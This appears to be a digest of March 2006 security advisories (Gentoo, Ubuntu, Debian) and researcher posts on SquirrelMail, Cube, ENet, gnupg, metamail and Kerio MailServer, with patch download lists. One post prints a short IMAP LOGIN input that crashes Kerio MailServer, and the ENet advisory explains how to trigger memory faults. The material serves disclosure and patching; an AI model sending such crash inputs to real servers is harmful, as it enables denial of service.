[ GLSA 200603-09 ] SquirrelMail: Cross-site scripting and IMAP command injection

[Stefan Cornelius]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200603-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
 Title: SquirrelMail: Cross-site scripting and IMAP command
injection
  Date: March 12, 2006
  Bugs: #123781
ID: 200603-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


SquirrelMail is vulnerable to several cross-site scripting
vulnerabilities and IMAP command injection.

Background
==

SquirrelMail is a webmail package written in PHP. It supports IMAP and
SMTP protocols.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  mail-client/squirrelmail1.4.6   = 1.4.6

Description
===

SquirrelMail does not validate the right_frame parameter in
webmail.php, possibly allowing frame replacement or cross-site
scripting (CVE-2006-0188). Martijn Brinkers and Scott Hughes discovered
that MagicHTML fails to handle certain input correctly, potentially
leading to cross-site scripting (only Internet Explorer,
CVE-2006-0195). Vicente Aguilera reported that the
sqimap_mailbox_select function did not strip newlines from the mailbox
or subject parameter, possibly allowing IMAP command injection
(CVE-2006-0377).

Impact
==

By exploiting the cross-site scripting vulnerabilities, an attacker can
execute arbitrary scripts running in the context of the victim's
browser. This could lead to a compromise of the user's webmail account,
cookie theft, etc. A remote attacker could exploit the IMAP command
injection to execute arbitrary IMAP commands on the configured IMAP
server.

Workaround
==

There is no known workaround at this time.

Resolution
==

All SquirrelMail users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =mail-client/squirrelmail-1.4.6

Note: Users with the vhosts USE flag set should manually use
webapp-config to finalize the update.

References
==

  [ 1 ] CVE-2006-0188
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0188
  [ 2 ] CVE-2006-0195
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0195
  [ 3 ] CVE-2006-0377
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0377

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-09.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


pgpGRsxhhFLFL.pgp
Description: PGP signature

[ GLSA 200603-10 ] Cube: Multiple vulnerabilities

[Stefan Cornelius]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200603-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: Cube: Multiple vulnerabilities
  Date: March 13, 2006
  Bugs: #125289
ID: 200603-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Cube is vulnerable to a buffer overflow, invalid memory access and
remote client crashes, possibly leading to a Denial of Service or
remote code execution.

Background
==

Cube is an open source first person shooter game engine supporting
multiplayer via LAN or internet.

Affected packages
=

---
 Package /   Vulnerable   / Unaffected
---
  1  games-fps/cube  = 20050829   Vulnerable!
---
 NOTE: Certain packages are still vulnerable. Users should migrate
   to another package if one is available or wait for the
   existing packages to be marked stable by their
   architecture maintainers.

Description
===

Luigi Auriemma reported that Cube is vulnerable to a buffer overflow in
the sgetstr() function (CVE-2006-1100) and that the sgetstr() and
getint() functions fail to verify the length of the supplied argument,
possibly leading to the access of invalid memory regions
(CVE-2006-1101). Furthermore, he discovered that a client crashes when
asked to load specially crafted mapnames (CVE-2006-1102).

Impact
==

A remote attacker could exploit the buffer overflow to execute
arbitrary code with the rights of the user running cube. An attacker
could also exploit the other vulnerabilities to crash a Cube client or
server, resulting in a Denial of Service.

Workaround
==

Play solo games or restrict your multiplayer games to trusted parties.

Resolution
==

Upstream stated that there will be no fixed version of Cube, thus the
Gentoo Security Team decided to hardmask Cube for security reasons. All
Cube users are encouraged to uninstall Cube:

# emerge --ask --unmerge games-fps/cube

References
==

  [ 1 ] CVE-2006-1100
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1100
  [ 2 ] CVE-2006-1101
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1101
  [ 3 ] CVE-2006-1102
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1102

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-10.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


pgpg3Kf4qGgQa.pgp
Description: PGP signature

[USN-262-1] Ubuntu 5.10 installer password disclosure

[Martin Pitt]

===
Ubuntu Security Notice USN-262-1 March 12, 2006
Ubuntu 5.10 installer vulnerability
https://launchpad.net/bugs/34606
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

base-config
passwd

The problem can be corrected by upgrading the affected package to
version 2.67ubuntu20 (base-config) and 1:4.0.3-37ubuntu8 (passwd).  In
general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Karl Øie discovered that the Ubuntu 5.10 installer failed to clean
passwords in the installer log files. Since these files were
world-readable, any local user could see the password of the first
user account, which has full sudo privileges by default.

The updated packages remove the passwords and additionally make the
log files readable only by root.

This does not affect the Ubuntu 4.10, 5.04, or the upcoming 6.04
installer.  However, if you upgraded from Ubuntu 5.10 to the current
development version of Ubuntu 6.04 ('Dapper Drake'), please ensure
that you upgrade the passwd package to version 1:4.0.13-7ubuntu2 to
fix the installer log files.


  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/b/base-config/base-config_2.67ubuntu20.dsc
  Size/MD5:  758 c22bb6e3be4d59aa93e84327f60e89ab

http://security.ubuntu.com/ubuntu/pool/main/b/base-config/base-config_2.67ubuntu20.tar.gz
  Size/MD5:   577194 99eabbe70227169feaff28ff9062d097

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.3-37ubuntu8.diff.gz
  Size/MD5:  1067297 9db7bb924125a5587380efc08f6787e1

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.3-37ubuntu8.dsc
  Size/MD5:  876 50cdfae3bfbe1bb1bb4be192d7de19a7

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.3.orig.tar.gz
  Size/MD5:  1045704 b52dfb2e5e8d9a4a2aae0ca1b266c513

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/b/base-config/apt-setup-udeb_2.67ubuntu20_all.udeb
  Size/MD5: 3298 dd42b2901f6f5d7525083c27cbb23407

http://security.ubuntu.com/ubuntu/pool/main/b/base-config/base-config_2.67ubuntu20_all.deb
  Size/MD5:   291224 e95d7a1d25074ea57d444e817cef1850

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/initial-passwd-udeb_4.0.3-37ubuntu8_all.udeb
  Size/MD5: 1740 6c7bc8e12968d9876b6e1b27f0476484

http://security.ubuntu.com/ubuntu/pool/main/b/base-config/tzsetup-udeb_2.67ubuntu20_all.udeb
  Size/MD5: 2760 f6ebc84fd2bff0275b1e64d53fdc9955

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_amd64.deb
  Size/MD5:   180662 de75ded6034f0d7226dfbf0ec66e2be7

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_amd64.deb
  Size/MD5:   589790 f90c48af4e1c55202f22127e72dbf45d

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_i386.deb
  Size/MD5:   171882 347fa929d15c3689bd68fc487cc116c6

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_i386.deb
  Size/MD5:   515580 b8c965e4a5c40d1c50e8816aeef689bc

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_powerpc.deb
  Size/MD5:   179886 42ebfcd496b621bdab29e9a6b3f50522

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_powerpc.deb
  Size/MD5:   568426 089edb3f8110ab191bba6d061b199385


signature.asc
Description: Digital signature

[USN-264-1] gnupg vulnerability

[Martin Pitt]

===
Ubuntu Security Notice USN-264-1 March 13, 2006
gnupg vulnerability
CVE-2006-0049
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

gnupg

The problem can be corrected by upgrading the affected package to
version 1.2.4-4ubuntu2.3 (for Ubuntu 4.10), 1.2.5-3ubuntu5.3 (for
Ubuntu 5.04), or 1.4.1-1ubuntu1.2 (for Ubuntu 5.10).  In general, a
standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Tavis Ormandy discovered a flaw in gnupg's signature verification. In
some cases, certain invalid signature formats could cause gpg to
report a 'good signature' result for auxiliary unsigned data which was
prepended or appended to the checked message part.


Updated packages for Ubuntu 4.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4-4ubuntu2.3.diff.gz
  Size/MD5:60031 fc55a23607cfac514084704155760cc8

http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4-4ubuntu2.3.dsc
  Size/MD5:  621 c0d08dda5a9b2bd3f130b94784082dc5
http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4.orig.tar.gz
  Size/MD5:  3451202 adfab529010ba55533c8e538c0b042a2

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4-4ubuntu2.3_amd64.deb
  Size/MD5:  1722782 8556e99b322bdf18ef7bad54329410df

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4-4ubuntu2.3_i386.deb
  Size/MD5:  1667764 410203ad10b3eb7faa56950958af

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4-4ubuntu2.3_powerpc.deb
  Size/MD5:  1721814 c6038008b123518fbf75f8547e1619a5

Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5-3ubuntu5.3.diff.gz
  Size/MD5:66069 42bba8259f5a074b89da1bb422889f1b

http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5-3ubuntu5.3.dsc
  Size/MD5:  654 5930a6888f76f726ea7076eff76f14e9
http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5.orig.tar.gz
  Size/MD5:  3645308 9109ff94f7a502acd915a6e61d28d98a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5-3ubuntu5.3_amd64.deb
  Size/MD5:   805910 4d69ba91dd0d2c79b54725d1bd139923

http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.2.5-3ubuntu5.3_amd64.udeb
  Size/MD5:   146442 a603783255829e50e444e859321e0001

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5-3ubuntu5.3_i386.deb
  Size/MD5:   750516 f8d97e8702866e76ba7b6ea5f946c4f0

http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.2.5-3ubuntu5.3_i386.udeb
  Size/MD5:   121348 1feb52e0c56d73302477a99569147519

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5-3ubuntu5.3_powerpc.deb
  Size/MD5:   806396 36ba1f3473c45060151e8f2089261172

http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.2.5-3ubuntu5.3_powerpc.udeb
  Size/MD5:   135406 a92ce4e3384f840cf48dc50de94c9d8d

Updated packages for Ubuntu 5.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.2.diff.gz
  Size/MD5:20510 acff054f7255a23ce8cd7595a68ca2b8

http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.2.dsc
  Size/MD5:  684 70749478363ef5374259a66ef5517bb7
http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1.orig.tar.gz
  Size/MD5:  4059170 1cc77c6943baaa711222e954bbd785e5

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.2_amd64.deb
  Size/MD5:  1136048 31643c8b2e3cfcd8774ad17ceb5e8e0c

http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.2_amd64.udeb
  Size/MD5:   152158 b7b70b5ee13b46854b9383b2a280aea0

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.2_i386.deb
  Size/MD5:  1044172 cdf0e85e58ba4b760741a72c5c7e6603

http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.2_i386.udeb
  Size/MD5:   130664 2719e86828d066102cade3457de20a6a

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.2_powerpc.deb
  Size/MD5:  1119252 208607aed4a4b0a4e27dc503e3c2147c

directory traversal Fixed in DirectContact 0.3c

[lionel]

Hi,

This security hole is fixed in version 0.3c.

The patch is automatically applied when DirectContact is restarted.

Regards,

Lionel Reyero

[SECURITY] [DSA 994-1] New freeciv packages fix denial of service

[Martin Schulze]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 994-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
March 13th, 2006http://www.debian.org/security/faq
- --

Package: freeciv
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2006-0047
BugTraq ID : 16975
Debian Bug : 355211

Luigi Auriemma discovered a denial of service condition in the free
Civilization server that allows a remote user to trigger a server
crash.

The old stable distribution (woody) is not affected by this problem.

For the stable distribution (sarge) this problem has been fixed in
version 2.0.1-1sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 2.0.8-1.

We recommend that you upgrade your freeciv-server package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/f/freeciv/freeciv_2.0.1-1sarge1.dsc
  Size/MD5 checksum:  997 bccef322ab4d8f0587818c489599133a

http://security.debian.org/pool/updates/main/f/freeciv/freeciv_2.0.1-1sarge1.diff.gz
  Size/MD5 checksum:44229 be1666c210b9d3e7e9161106b68abb10

http://security.debian.org/pool/updates/main/f/freeciv/freeciv_2.0.1.orig.tar.gz
  Size/MD5 checksum: 11086541 2deea98d258138325f590ec52d530a96

  Architecture independent components:


http://security.debian.org/pool/updates/main/f/freeciv/freeciv-data_2.0.1-1sarge1_all.deb
  Size/MD5 checksum:  3843498 fc7fd56c3c37efc8489be7880f5d2384

http://security.debian.org/pool/updates/main/f/freeciv/freeciv-gtk_2.0.1-1sarge1_all.deb
  Size/MD5 checksum:11368 7edc101b169b712d3be5dc5433dc4bbb

http://security.debian.org/pool/updates/main/f/freeciv/freeciv-xaw3d_2.0.1-1sarge1_all.deb
  Size/MD5 checksum:11372 d5d9e78a83c5a5d534d56a0ffc393acf

http://security.debian.org/pool/updates/main/f/freeciv/freeciv_2.0.1-1sarge1_all.deb
  Size/MD5 checksum:11360 7d948bf16bc697808e805e46211b4e08

  Alpha architecture:


http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-gtk_2.0.1-1sarge1_alpha.deb
  Size/MD5 checksum:   590368 f9d6ab21f6341eaf0e3dacf87b59ad32

http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-xaw3d_2.0.1-1sarge1_alpha.deb
  Size/MD5 checksum:   514694 a6e39f77c6951b97b9befbec19d892bf

http://security.debian.org/pool/updates/main/f/freeciv/freeciv-server_2.0.1-1sarge1_alpha.deb
  Size/MD5 checksum:   591244 4c331477f15855f6eb488ac47ebd0c38

  AMD64 architecture:


http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-gtk_2.0.1-1sarge1_amd64.deb
  Size/MD5 checksum:   476454 fbdb18b936d0cec1c3722162e8bd964a

http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-xaw3d_2.0.1-1sarge1_amd64.deb
  Size/MD5 checksum:   409102 7f2fa87b7ffd9ff84a85a35b3d82dc07

http://security.debian.org/pool/updates/main/f/freeciv/freeciv-server_2.0.1-1sarge1_amd64.deb
  Size/MD5 checksum:   465942 480cb2efba03369e28b77647841859e9

  ARM architecture:


http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-gtk_2.0.1-1sarge1_arm.deb
  Size/MD5 checksum:   423194 0f7e6820a48890e8e82669ff0bbd4422

http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-xaw3d_2.0.1-1sarge1_arm.deb
  Size/MD5 checksum:   361728 7eb46efcc7bcc3f3a56c3a283dad1f97

http://security.debian.org/pool/updates/main/f/freeciv/freeciv-server_2.0.1-1sarge1_arm.deb
  Size/MD5 checksum:   419804 d9eb16ebbd1a601f2dbcf1bd03982316

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-gtk_2.0.1-1sarge1_i386.deb
  Size/MD5 checksum:   440936 6c2ff70b8d5980f30662ee1ed23c6a59

http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-xaw3d_2.0.1-1sarge1_i386.deb
  Size/MD5 checksum:   366828 909f29a8fadf9241525f71c0f3e7c59f

http://security.debian.org/pool/updates/main/f/freeciv/freeciv-server_2.0.1-1sarge1_i386.deb
  Size/MD5 checksum:   430250 3a04f91ae1487a9b9624045426a54247

  Intel IA-64 architecture:

Multiple vulnerabilities in ENet library (Jul 2005)

[Luigi Auriemma]

###

 Luigi Auriemma

Application:  ENet library
  http://enet.bespin.org
Versions: = Jul 2005 (it's the current CVS version)
Platforms:Windows, *nix, *BSD and more
Bugs: A] invalid memory access (32 bit)
  B] allocation abort with fragment
Exploitation: remote
Date: 12 Mar 2006
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:http://aluigi.altervista.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


ENet is a powerful open source library for handling UDP connections (it
can be defined almost a sort of TCP over UDP).
It's very used in some games and engines like Cube, Sauerbraten,
Duke3d_w32 and others.


###

===
2) Bugs
===

-
A] invalid memory access (32 bit)
-

ENet uses 32 bit numbers for almost all the parameters in its packets,
like fragments offset, data size, timestamps, challenge numbers and so
on.
Each packet received by the library (enet_host_service) is handled by
the enet_protocol_handle_incoming_commands function.
This function uses a pointer (currentData) which points to the current
command, each packet can contain one or more commands which describe
operations like a connection request, an acknowledge, a fragment, a
message and more.
The instruction which checks this pointer to avoid that it points over
the received packet can be eluded through a big (negative on 32 bit
CPU) header.commandLength parameter.
After having bypassed the check currentData will point to an invalid
zone of the memory and when the cycle will continue on the subsequent
command (commandCount must be major than one) the application will
crash.
64 bit CPUs should be not vulnerable.

From enet_protocol_handle_incoming_commands in protocol.c:
...
currentData = host - receivedData + sizeof (ENetProtocolHeader);
  
while (commandCount  0 
   currentData   host - receivedData [host - receivedDataLength])
{
   command = (ENetProtocol *) currentData;

   if (currentData + sizeof (ENetProtocolCommandHeader)   host - 
receivedData [host - receivedDataLength])
 return 0;

   command - header.commandLength = ENET_NET_TO_HOST_32 (command - 
header.commandLength);

   if (currentData + command - header.commandLength   host - 
receivedData [host - receivedDataLength])
 return 0;

   -- commandCount;
   currentData += command - header.commandLength;
...


-
B] allocation abort with fragment
-

ENet supports also the handling of fragments used to build the messages
bigger than the receiver's MTU.
When a fragment is received the library allocates the total message
size in memory so it can easily rebuild all the subsequent fragments in
this buffer.
If the total data size specified by the attacker cannot be allocated,
the library calls abort() and all the program terminates.

From enet_protocol_handle_send_fragment in protocol.c:
...
   startCommand = enet_peer_queue_incoming_command (peer, 
 hostCommand, 
enet_packet_create 
(NULL, totalLength, ENET_PACKET_FLAG_RELIABLE),
fragmentCount);


###

===
3) The Code
===


http://aluigi.altervista.org/poc/enetx.zip


###

==
4) Fix
==


No fix.
No reply from the developers.


###


--- 
Luigi Auriemma
http://aluigi.altervista.org

[SECURITY] [DSA 995-1] New metamail packages fix arbitrary code execution

[Martin Schulze]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 995-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Steve Kemp
March 13th, 2006http://www.debian.org/security/faq
- --

Package: metamail
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2006-0709
BugTraq ID : 16611
Debian Bug : 352482

Ulf Harnhammar discoverd a buffer overflow in metamail, an
implementation of MIME (Multi-purpose Internet Mail Extensions), that
could lead to a denial of service or potentially execute arbitrary
code when processing messages.

For the old stable distribution (woody) this problem has been fixed in
version 2.7-45woody.4.

For the stable distribution (sarge) this problem has been fixed in
version 2.7-47sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 2.7-51.

We recommend that you upgrade your metamail package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:


http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4.dsc
  Size/MD5 checksum:  613 6ee8aeff0f14e5d799a670fe727039c7

http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4.diff.gz
  Size/MD5 checksum:   333628 22588d5a91f53fdc1a6458c5519d2512

http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7.orig.tar.gz
  Size/MD5 checksum:   156656 c6967e9bc5d3c919764b02df24efca01

  Alpha architecture:


http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_alpha.deb
  Size/MD5 checksum:   166084 a45a36ff283de7cb3ab3e43694f90c45

  ARM architecture:


http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_arm.deb
  Size/MD5 checksum:   153404 52e740cb6dbc32c860da10010bb90571

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_i386.deb
  Size/MD5 checksum:   150578 4d3e962558adfd7f43859b9f7fd30450

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_ia64.deb
  Size/MD5 checksum:   205790 1e9d9f11ca4fbb1863db2e205d808c23

  HP Precision architecture:


http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_hppa.deb
  Size/MD5 checksum:   153406 7897b81f6f0ee82abbcf415e258d8c9d

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_m68k.deb
  Size/MD5 checksum:   146400 a3cc53e414d0e60e54e4ac92849b4d0d

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_mips.deb
  Size/MD5 checksum:   158558 82cd3b0bb263e24f0a6f7c500a01d0af

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_mipsel.deb
  Size/MD5 checksum:   158562 b0a037641e1fa292decffa319cf75daf

  PowerPC architecture:


http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_powerpc.deb
  Size/MD5 checksum:   148694 f326ccce8fd7cf2445e0f716fcc65143

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_s390.deb
  Size/MD5 checksum:   151512 ad0e4e1d1ee73ac300e4f1dc07bcfb5d

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_sparc.deb
  Size/MD5 checksum:   155492 cf37f006621cbff83fb236afd8bfc223


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-47sarge1.dsc
  Size/MD5 checksum:  594 3131f64cf684d62318636b8589acbc94

http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-47sarge1.diff.gz
  Size/MD5 checksum:   340408 165af1d9cff83f10103ebddfdb90f2ad

http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7.orig.tar.gz
  Size/MD5 checksum:   156656 c6967e9bc5d3c919764b02df24efca01

  Alpha architecture:


http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-47sarge1_alpha.deb
  Size/MD5 checksum:   168190 

Kerio MailServer bugfun

[Evgeny Legerov]

Hi,

It should be noted that ProtoVer Sample IMAP testsuite has been released
with 3 unpublished bugs.

Now it looks like that Kerio MailServer preauth bug has been fixed. 

Kerio MailServer 6.1.3 changelog:

Version 6.1.3 Patch 1 - March 9, 2006
- Fixed possible crash when handling special crafted IMAP LOGIN command.


The bug itself is really simple:
$ ls PROTOVER_SAMPLE_IMAP-1.0/audit/
iaemailserver-5.3.4  keriomailserver-6.1.2  merak-8.3.0
$ cat PROTOVER_SAMPLE_IMAP-1.0/audit/keriomailserver-6.1.2
a001 LOGIN {4294967294}
LITERAL TOKEN
a002 LOGOUT


Regards,
Evgeny Legerov
www.gleg.net

[SECURITY] [DSA 993-2] New GnuPG packages fix broken signature check

[Martin Schulze]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 993-2 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
March 13th, 2006http://www.debian.org/security/faq
- --

Package: gnupg
Vulnerability  : programming error
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2006-0049

Tavis Ormandy noticed that gnupg, the GNU privacy guard - a free PGP
replacement, can be tricked to emit a good signature status message
when a valid signature is included which does not belong to the data
packet.  This update basically adds fixed packages for woody whose
version turned out to be vulnerable as well.

For the old stable distribution (woody) this problem has been fixed in
version 1.0.6-4woody5.

For the stable distribution (sarge) this problem has been fixed in
version 1.4.1-1.sarge3.

For the unstable distribution (sid) this problem has been fixed in
version 1.4.2.2-1.

We recommend that you upgrade your gnupg package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:

http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5.dsc
  Size/MD5 checksum:  579 b34d5a5996b358e713e2e8bb71dc6404

http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5.diff.gz
  Size/MD5 checksum: 7866 5e36a3c06fae2b3d96a9db65988fffbd
http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6.orig.tar.gz
  Size/MD5 checksum:  1941676 7c319a9e5e70ad9bc3bf0d7b5008a508

  Alpha architecture:


http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_alpha.deb
  Size/MD5 checksum:  1150716 ff72280db81dbc60041cd91a0d307ee6

  ARM architecture:


http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_arm.deb
  Size/MD5 checksum:   987194 1ca0bbdaaec049b128996cdd9f776834

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_i386.deb
  Size/MD5 checksum:   966800 52e985fbb5e9bcd7baa320c549b7b70c

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_ia64.deb
  Size/MD5 checksum:  1271958 27317f852e24ce3784ec62aec0860c6a

  HP Precision architecture:


http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_hppa.deb
